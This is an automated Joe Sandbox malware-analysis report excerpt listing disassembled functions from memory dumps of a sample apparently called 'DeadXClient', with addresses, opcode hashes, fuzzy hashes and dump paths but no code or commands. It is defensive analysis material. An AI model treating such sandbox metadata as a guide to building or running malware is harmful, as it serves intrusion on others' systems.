                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3de091e80484af78fd82a8ee6e138559d4ca3e2c24e649747783e065b494c239
                                                        • Instruction ID: 37d77e4429c54438b9859350f2330ae7f14156fb70c5834d10e12ce49dd442d5
                                                        • Opcode Fuzzy Hash: 3de091e80484af78fd82a8ee6e138559d4ca3e2c24e649747783e065b494c239
                                                        • Instruction Fuzzy Hash: C6415B20B2D98D0FD715EB3C88655B57BE1EF8A304B0601F6E08EC71A7D928EC028741
                                                        Function 00007FFD9B801169 Relevance: .1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8de029d17034031beba3e610f08157ff5617be87ef473f689b5d6e22cbce71a9
                                                        • Instruction ID: 0c2d05bf1b763669ef74741b34045d5e29751fb2153c427d4cb7f4b2f77c089a
                                                        • Opcode Fuzzy Hash: 8de029d17034031beba3e610f08157ff5617be87ef473f689b5d6e22cbce71a9
                                                        • Instruction Fuzzy Hash: 5931CA71A8E1951FD31657746C638E23BA49F4722471A42B7E098CB9E3C81D6793C3A2
                                                        Function 00007FFD9B801259 Relevance: .1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc8a9fd71c47f23c58faeca2d1e0ef8e7414ecd8d5358e338414b7e861dcbad9
                                                        • Instruction ID: 59aa5a967442e2917ede54dc8bffbe61a5accfd8b3e73c7e368c33cfc9077ee9
                                                        • Opcode Fuzzy Hash: fc8a9fd71c47f23c58faeca2d1e0ef8e7414ecd8d5358e338414b7e861dcbad9
                                                        • Instruction Fuzzy Hash: DF01F901F1E84A0BE354AB7C5CB9AF567C1DF9A265B4541B6F44CC32E7DC195C428351
                                                        Function 00007FFD9B8004D8 Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 71f7ea16428c26bb1a04423062e3f6bbd715203955f1a77a00c30470669dcebb
                                                        • Instruction ID: 529d2fccfc7cd7aafe88d0d33db73b13893defc573a32a61c1d0d5f0d573f023
                                                        • Opcode Fuzzy Hash: 71f7ea16428c26bb1a04423062e3f6bbd715203955f1a77a00c30470669dcebb
                                                        • Instruction Fuzzy Hash: E2F0F902F1A80E07E7A4AABC18F96F553C1DF9E275B400135F45DC32EADC195C824380
                                                        Function 00007FFD9B8004E0 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1294563924036899762226a6afd29f903067abdbd8fb2b846cf3ba10b1233503
                                                        • Instruction ID: 2ecfee005bb9a22f383aa529362a5f381f2cfc9418683e345a44d58dc0fab972
                                                        • Opcode Fuzzy Hash: 1294563924036899762226a6afd29f903067abdbd8fb2b846cf3ba10b1233503
                                                        • Instruction Fuzzy Hash: 01F0F430B2991E0BD764AB2CA8956A933D1EF8D314B510538E04EC33D9DE28A9018782
                                                        Function 00007FFD9B800A59 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cb28250cd0b65333a324cd1638aa82228121ad838dafb9a4cf1f472d207a65c3
                                                        • Instruction ID: 12779cf1d305e328641c7728b047862c673b0bdc7e330f3af42ac39e8da48f3f
                                                        • Opcode Fuzzy Hash: cb28250cd0b65333a324cd1638aa82228121ad838dafb9a4cf1f472d207a65c3
                                                        • Instruction Fuzzy Hash: CD01F720E6F28A0FE79663B01836AF43F915F47754F4A40FAE48C8A0E3CD5D59468361
                                                        Function 00007FFD9B800BA5 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4b6986dd7c63cc42423ef241f50872d52d1daaf44a1fa17ea279c26564cde6cc
                                                        • Instruction ID: 6bc5ff93a64cc608485d1033faef72e5802e4526f54e51763a169fe41814facd
                                                        • Opcode Fuzzy Hash: 4b6986dd7c63cc42423ef241f50872d52d1daaf44a1fa17ea279c26564cde6cc
                                                        • Instruction Fuzzy Hash: DFF08B21B0DA590FD349BA28A8B58EA7BD1DF98250B0608B6F848CB1E7DD18D9858391

                                                        Executed Functions

                                                        Function 00007FFD9B7F0E79 Relevance: 2.0, Strings: 1, Instructions: 730COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: SAM_^
                                                        • API String ID: 0-3658645246
                                                        • Opcode ID: 9651717fb3943bbbf90f9ec1155340cf007fff88afc1baf574bc954996c07dd4
                                                        • Instruction ID: 1fbb009390564d56ed528dee2d6d9cc6d9d97c95db5c6922eb6cacc960b1fa9d
                                                        • Opcode Fuzzy Hash: 9651717fb3943bbbf90f9ec1155340cf007fff88afc1baf574bc954996c07dd4
                                                        • Instruction Fuzzy Hash: 8432A460B1DA4D4BEB98EB7C8469A7977D2FF98300F4145BDE00DC32EADD28B8418785
                                                        Function 00007FFD9B7F6F66 Relevance: .5, Instructions: 470COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 588fcf9aa1adb13c3a3638825938aec78924569db5d599d3a773f0014f46435d
                                                        • Instruction ID: 73a2c7b1275e81cbf7a07b96e6bb4751cd01e4c13292fee81ecdaa55499962d2
                                                        • Opcode Fuzzy Hash: 588fcf9aa1adb13c3a3638825938aec78924569db5d599d3a773f0014f46435d
                                                        • Instruction Fuzzy Hash: DAF1A530A09A8D8FEBA8DF28C8557E97BE1FF54310F14426EE84DC72A5DB3499458B81
                                                        Function 00007FFD9B7F7D12 Relevance: .5, Instructions: 456COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 231bd397492d362c6495f88d014849242f4f04755d45f0a7a14db90c1f91be7f
                                                        • Instruction ID: fa75cd1df8a5b874537bc8e6c8b61c65b3ca0c15c26ac9ca4d0fc8dd5999dba5
                                                        • Opcode Fuzzy Hash: 231bd397492d362c6495f88d014849242f4f04755d45f0a7a14db90c1f91be7f
                                                        • Instruction Fuzzy Hash: 72E1B430A09A4D8FEBA8DF28C8557E97BD1FF54310F14436ED84DC72A5DA74994187C2
                                                        Function 00007FFD9B7F1799 Relevance: .2, Instructions: 192COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ff4ee0abe1696e565699d2f4b325f9f2acfc6d1c34065f64d0c46aedd9d5dd6
                                                        • Instruction ID: 9831a2b4854198bc89123a152b0b27d271cc4ebd9b749c983e8f4f8732f9c144
                                                        • Opcode Fuzzy Hash: 4ff4ee0abe1696e565699d2f4b325f9f2acfc6d1c34065f64d0c46aedd9d5dd6
                                                        • Instruction Fuzzy Hash: 11511C20B0E6C90FDB9AAB7848746A5BFD0DF96219F0801FAE09DC71E7DD185802C386
                                                        Function 00007FFD9B7F24B1 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: SAM_^
                                                        • API String ID: 0-3658645246
                                                        • Opcode ID: bc9bbf2c28668a87a8cfaa827e89cdb20fa28bf9a201c99c0582bce5ef903afd
                                                        • Instruction ID: a1b6ed9dbe933a6e781844a229bff195eedaba8bb42cec6e898dce3312e5b62a
                                                        • Opcode Fuzzy Hash: bc9bbf2c28668a87a8cfaa827e89cdb20fa28bf9a201c99c0582bce5ef903afd
                                                        • Instruction Fuzzy Hash: 1C118720F0E39A0BE325A7B948719793E61AF86314F8602B9E01CCB1E7DD6C594683D6
                                                        Function 00007FFD9B7F85F1 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: d
                                                        • API String ID: 0-2564639436
                                                        • Opcode ID: ca5e2a982c62d49392875d09742ce3e25b2f3b40902b456f04dd3cf8cc3658c7
                                                        • Instruction ID: b41d79a4cf93dbcd9ea7dd1b726ade15ffb4ae40a20e458318c8d4ee2b40e0e4
                                                        • Opcode Fuzzy Hash: ca5e2a982c62d49392875d09742ce3e25b2f3b40902b456f04dd3cf8cc3658c7
                                                        • Instruction Fuzzy Hash: 6B11B471F0935D8FEB249BE488656FD7BA0FF55304F06027BC90DD21A2DB29694087D5
                                                        Function 00007FFD9B7F2518 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: SAM_^
                                                        • API String ID: 0-3658645246
                                                        • Opcode ID: a116f73d4b70602a1200d66e3d86c08c322a1684bef44a7538b7f53551f4c21a
                                                        • Instruction ID: a4e3104255acb9d4348af8fc8eb452fb322c60bb0cd04a68abfa222e13b7523b
                                                        • Opcode Fuzzy Hash: a116f73d4b70602a1200d66e3d86c08c322a1684bef44a7538b7f53551f4c21a
                                                        • Instruction Fuzzy Hash: F4F06230F0D24A8BE374DB988460A787BA2AB95310F910778E01DC32F5DF28A94297C9
                                                        Function 00007FFD9B7F2EB0 Relevance: .5, Instructions: 511COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6f2159496ec0248daabd3b1dbf420249e0d83972e79bbc906df94c23de59415
                                                        • Instruction ID: fa75ec9e2ff9bdb2c98ee654caa31de924dbe0189c43751aff2bf8bb672309fb
                                                        • Opcode Fuzzy Hash: f6f2159496ec0248daabd3b1dbf420249e0d83972e79bbc906df94c23de59415
                                                        • Instruction Fuzzy Hash: 14B17062B0DA4D0FE768AB2C54346B87BD1EF98310F4506BEE05EC33E6DD286C024395
                                                        Function 00007FFD9B7F8BF5 Relevance: .4, Instructions: 419COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cb804e9c654817715f644fec334dc4fc340b8317e63d69a18034f9caf714f05
                                                        • Instruction ID: 660df4540215c71f07b017e538e74018e5f50ac8d0ab9637456f5278edbe2bb3
                                                        • Opcode Fuzzy Hash: 6cb804e9c654817715f644fec334dc4fc340b8317e63d69a18034f9caf714f05
                                                        • Instruction Fuzzy Hash: 5FD12730F1E60E8FEB54EB789865AB97BE1EF45300F4502B9E01DC71F6CE2869468395
                                                        Function 00007FFD9B7F7926 Relevance: .3, Instructions: 331COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1d1ee0c109402bcdbe239b629de49f02d68d91637a70138ea963ee482d7b7388
                                                        • Instruction ID: 68e00a7e9d8b6075caeb5b5415f5c63cf14370a3cb7d1dddad3b1894e791afa9
                                                        • Opcode Fuzzy Hash: 1d1ee0c109402bcdbe239b629de49f02d68d91637a70138ea963ee482d7b7388
                                                        • Instruction Fuzzy Hash: E1B1C430609B4D8FEB69DF28C8557E93BE1FF55310F14426AE84DC72A6CA34A945CB82
                                                        Function 00007FFD9B7F06F8 Relevance: .3, Instructions: 321COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ccb2727a32b7f2c01601e6af8057834f4ef5258cdc0cdf8a9d496e4b7a81e5e8
                                                        • Instruction ID: 4fab566b8bfc06486d7efd6565e576b9c1de519bd376f4ebe79ce0854a0ec283
                                                        • Opcode Fuzzy Hash: ccb2727a32b7f2c01601e6af8057834f4ef5258cdc0cdf8a9d496e4b7a81e5e8
                                                        • Instruction Fuzzy Hash: 11915962B1DE4D0BE7A8AB2C54696B876D2FF98310F55067DE04EC33E6DD286D028385
                                                        Function 00007FFD9B7F33E5 Relevance: .3, Instructions: 303COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 735d1d4a32d385ee9a459a242b01f18e4245adfb8dddd05242c63418a4cd496a
                                                        • Instruction ID: 043463b5db3f3af7e8cb3d36ecb71784acb2e77b0f66727202595c64dba16037
                                                        • Opcode Fuzzy Hash: 735d1d4a32d385ee9a459a242b01f18e4245adfb8dddd05242c63418a4cd496a
                                                        • Instruction Fuzzy Hash: 0D91D424B5CA4D5BEB84B7AC9869B79B6D6EFD8304F5141B9E00CC32EBCD18B8418357
                                                        Function 00007FFD9B7F0700 Relevance: .3, Instructions: 275COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 25b87630f4231af9061083c84d24eb40151d25f7199323b010a77c1825f6a063
                                                        • Instruction ID: d32cdacdefc65b561effdd71f4f3ea1568f5bb0865078690fb72b1ef9bb6105c
                                                        • Opcode Fuzzy Hash: 25b87630f4231af9061083c84d24eb40151d25f7199323b010a77c1825f6a063
                                                        • Instruction Fuzzy Hash: 5981A624B5890D5BE788B7AC946AB79B2D7EFD8304F514179E00DC33EACD28B8418357
                                                        Function 00007FFD9B7F05A0 Relevance: .2, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0449c9e4319f11975266054823c4da1e40b429ec8b5e09dd37083e76bfb9efd2
                                                        • Instruction ID: 7a1a991f7c38fcc632ef7b4a9aa5c654aff989008ceaeda643962981f2964367
                                                        • Opcode Fuzzy Hash: 0449c9e4319f11975266054823c4da1e40b429ec8b5e09dd37083e76bfb9efd2
                                                        • Instruction Fuzzy Hash: 1161F631B19A0E4FE754EA6C98655FD77E2EF84311F4502BAD40DC33EADD286D028395
                                                        Function 00007FFD9B7F13C8 Relevance: .2, Instructions: 237COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 631404277075bb179a20c50d38aa1f16830560ade633334e74cfd28ca837c5a3
                                                        • Instruction ID: 2aebb61a33e68d72a213fe8386b5ee6bcaeb2f7e8c21e5eab1745c9915a1a6d5
                                                        • Opcode Fuzzy Hash: 631404277075bb179a20c50d38aa1f16830560ade633334e74cfd28ca837c5a3
                                                        • Instruction Fuzzy Hash: E8613661F1DE4E0BE7A8EB6C486967DBBC2EFD8210F4502BDD04EC36E6DD18A8014385
                                                        Function 00007FFD9B7F5D1D Relevance: .2, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ba6551791bb161f71d080de7e3d62f1fd84c359be50005cbb795898e44ec404
                                                        • Instruction ID: 2209c113295692e1447402c8623f0b0fc165a454d7128b0eae96cda3eb635a28
                                                        • Opcode Fuzzy Hash: 3ba6551791bb161f71d080de7e3d62f1fd84c359be50005cbb795898e44ec404
                                                        • Instruction Fuzzy Hash: 03619630A18A4D8FDB58DB68D859BEDBBF1FF59310F1042AED05DD3296CA34A845CB81
                                                        Function 00007FFD9B7F86CD Relevance: .2, Instructions: 209COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c02edca80a3b1d95caaabfff08d20534238ee7c1ea5718c5f6bb53a1d5f10508
                                                        • Instruction ID: 37ca9227dcf7268e7fa2edfae7037da88a2876edcac52afb4c2e93a06898a70a
                                                        • Opcode Fuzzy Hash: c02edca80a3b1d95caaabfff08d20534238ee7c1ea5718c5f6bb53a1d5f10508
                                                        • Instruction Fuzzy Hash: 0A518530A18A0C8FDB58DF58D855BEDBBF1FF99310F1042AAD44DD3296CA34A942CB81
                                                        Function 00007FFD9B7F445C Relevance: .2, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af3c16e8c1f1d87772cb2b5474ed7333aa884e461c66d4e207575be28a0c0cb0
                                                        • Instruction ID: 5596015ab492dc9bea2c9e3d6de552dacb4a5e48bc907d3cab974cdb5ec692f8
                                                        • Opcode Fuzzy Hash: af3c16e8c1f1d87772cb2b5474ed7333aa884e461c66d4e207575be28a0c0cb0
                                                        • Instruction Fuzzy Hash: 6B516470A08A1C8FDB58DF58D855BE9BBF1FB59310F0082AAD04DD3256DE34A9858F81
                                                        Function 00007FFD9B7F96AA Relevance: .2, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c1bd4846be93402820612f164af3cb601ccf57b27a605cb4bc19071567e4185a
                                                        • Instruction ID: 9277d343410bb713b78404d0429f2041996125a2cfba94d0584b5b581bb66a57
                                                        • Opcode Fuzzy Hash: c1bd4846be93402820612f164af3cb601ccf57b27a605cb4bc19071567e4185a
                                                        • Instruction Fuzzy Hash: 01510530A0D74D8FDB58EF68C869AB87BE0FF55320F45426ED04DC71A2DB29A446CB90
                                                        Function 00007FFD9B7F2928 Relevance: .2, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7f64c354f9caf8e7771082eeac5a451a279a533dd2c7091ca277b5d937f4224f
                                                        • Instruction ID: a2cb507f97bf9a668bf4557da9255b795a07e2fe1503c285d87edf4cdb43509f
                                                        • Opcode Fuzzy Hash: 7f64c354f9caf8e7771082eeac5a451a279a533dd2c7091ca277b5d937f4224f
                                                        • Instruction Fuzzy Hash: 35513730F0D78A4FD756D7B448216A57FA0EF56310B5903E9E0A9C31F7CD686802C791
                                                        Function 00007FFD9B7F93ED Relevance: .2, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ed437a3c8b9dff3c17bb45fdb50b0ad0057cc12dc22e17e08a94abe00f79697a
                                                        • Instruction ID: 373c318b2f47ddeee0d21d6eb4d5ac92e08fffe002ad401f71f091aba35563ea
                                                        • Opcode Fuzzy Hash: ed437a3c8b9dff3c17bb45fdb50b0ad0057cc12dc22e17e08a94abe00f79697a
                                                        • Instruction Fuzzy Hash: 46412821B0E6C94FDB56ABB858785B9BFD4DF97225B1800FBE09DC61E3DC185842C386
                                                        Function 00007FFD9B7F2685 Relevance: .2, Instructions: 157COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b6662bc2d1a2ed7c14ae047c61d1c75540c1f95b13e94024d432ddf3ef595490
                                                        • Instruction ID: a82508f05f8e15b370cd461efc191e4f634ca22459cfd491fc688278040e2e34
                                                        • Opcode Fuzzy Hash: b6662bc2d1a2ed7c14ae047c61d1c75540c1f95b13e94024d432ddf3ef595490
                                                        • Instruction Fuzzy Hash: 3D417074A0DA0D8FDB98EFA8D469AB97BE0FF55311F10016EE00AC36A1CB75E841CB45
                                                        Function 00007FFD9B7F9110 Relevance: .2, Instructions: 154COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9e480510859483623efb188541eb8759f65a355be92a37fd083574e87334f68d
                                                        • Instruction ID: 56f94246d853ae305cd1312ac4246e1c19f6468ab66a0078d361abdabd7ce0e9
                                                        • Opcode Fuzzy Hash: 9e480510859483623efb188541eb8759f65a355be92a37fd083574e87334f68d
                                                        • Instruction Fuzzy Hash: 5B418031B1890C4FDB98EBA8D469AB977E2FF98310F454179E00ED72A6CE24AC418780
                                                        Function 00007FFD9B7F0BFE Relevance: .2, Instructions: 152COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e052c81b95288aeaee0bb333dc1d1754dfd53e4762370cddc7b2805b65ab3140
